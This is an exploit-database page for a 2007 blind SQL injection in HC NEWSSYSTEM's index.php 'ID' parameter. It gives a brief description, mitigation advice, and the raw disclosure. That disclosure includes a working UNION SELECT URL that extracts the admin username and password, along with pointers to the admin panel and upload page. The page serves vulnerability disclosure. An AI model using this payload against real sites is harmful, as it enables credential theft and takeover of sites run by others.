header-logo
Suggest Exploit
vendor:
HC NEWSSYSTEM
by:
UniquE-Key
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: HC NEWSSYSTEM
Affected Version From: 1
Affected Version To: 1.4
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

HC NEWSSYSTEM 1.0-4 (index.php “ID”) Blind SQL Injection

The HC NEWSSYSTEM 1.0-4 is vulnerable to a blind SQL injection attack through the 'ID' parameter in the index.php file. An attacker can exploit this vulnerability to execute arbitrary SQL queries and potentially gain unauthorized access to the application's database.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user input before using it in SQL queries. Additionally, implementing prepared statements or parameterized queries can help prevent SQL injection attacks.
Source

Exploit-DB raw data:

HC NEWSSYSTEM 1.0-4 (index.php "ID") Blind SQL Injection

Type :

SQL Injection

Release Date :

{2007-03-08}

Product / Vendor :

HC Design News Publisher.

http://www.hcdesign.at/demo

Bug :

http://localhost/script/index.php?option=news&aktion=komm&ID=-SQL Inj.-

SQL Inj Code :

Admin Username/Password Query

http://localhost/path/index.php?option=news&aktion=komm&ID=-1/**/UNION/**/SELECT/**/null,null,mname,null,mpassword,null,null/**/FROM/**/hcmitglieder/**/WHERE/**/id=1/*

Tested :

HC NEWSSYSTEM Version:1.4

Vulnerable :

HC NEWSSYSTEM Version:1.0

-------------------------

HC NEWSSYSTEM Version:1.4

Note :

Title

"HC NEWSSYSTEM Version:1.4"

Admin Panel

http://www.victim.com/[path]/admin

Code Upload

http://www.victim.com/[path]/admin/upload.php

Author :

UniquE-Key{UniquE-Cracker}
UniquE(at)UniquE-Key.Org
http://www.UniquE-Key.Org

# milw0rm.com [2007-03-10]